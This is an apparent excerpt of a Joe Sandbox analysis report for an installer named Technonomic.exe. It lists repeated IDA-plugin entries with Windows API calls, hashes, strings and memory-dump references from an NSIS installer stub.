                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                                                                                      • Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                                                                                      • Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
                                                                                                                                                                      • Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                                                                                      • Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59
                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                      • Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                                                                                      • Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
                                                                                                                                                                      • Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                                                                                      • Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                                                                                      • wsprintfW.USER32 ref: 00404B48
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                      • String ID: %u.%u%s%s$H7B
                                                                                                                                                                      • API String ID: 3540041739-107966168
                                                                                                                                                                      • Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                                                                                      • Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                                                                                      • Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC
                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll,?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll$artikulationer\Udsorteringerne
                                                                                                                                                                      • API String ID: 3109718747-3228411233
                                                                                                                                                                      • Opcode ID: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
                                                                                                                                                                      • Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
                                                                                                                                                                      • Opcode Fuzzy Hash: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
                                                                                                                                                                      • Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                      • Opcode ID: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
                                                                                                                                                                      • Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
                                                                                                                                                                      • Opcode Fuzzy Hash: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
                                                                                                                                                                      • Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3808545654-0
                                                                                                                                                                      • Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                                                                                      • Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                                                                                      • Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                      • String ID: !
                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                      • Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                                                                                      • Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
                                                                                                                                                                      • Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                                                                                      • Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405BF0
                                                                                                                                                                      • CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                                                                                      • CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                                                                                      Strings
                                                                                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharNext
                                                                                                                                                                      • String ID: Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                                                                      • API String ID: 3213498283-4064111799
                                                                                                                                                                      • Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                                                                                      • Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
                                                                                                                                                                      • Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                                                                                      • Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B3D
                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B47
                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405B59
                                                                                                                                                                      Strings
                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B37
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                      • API String ID: 2659869361-297319885
                                                                                                                                                                      • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                                                      • Instruction ID: 377234fc647d40db67a969affeec1c2d2c00c7240f2da489af686c3f2ce23dc9
                                                                                                                                                                      • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                                                      • Instruction Fuzzy Hash: E1D05E711019246AC1117B448D04DDB63ACAE45300341046EF202B70A6C778695286FD
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(00000290,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 004038EC
                                                                                                                                                                      • CloseHandle.KERNEL32(000002A4,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 00403900
                                                                                                                                                                      Strings
                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nsa27B0.tmp, xrefs: 00403910
                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa27B0.tmp
                                                                                                                                                                      • API String ID: 2962429428-308447161
                                                                                                                                                                      • Opcode ID: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                                                                                      • Instruction ID: de49926bb72e77a98f9c5ce19ed8b4a608a10c25b77e0dec4f49a46a5066bf07
                                                                                                                                                                      • Opcode Fuzzy Hash: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                                                                                      • Instruction Fuzzy Hash: E2E086B140071896C5246F7CAD4D9953A185F453357244326F078F60F0C7789A675A99
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00405285
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052D6
                                                                                                                                                                        • Part of subcall function 00404293: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
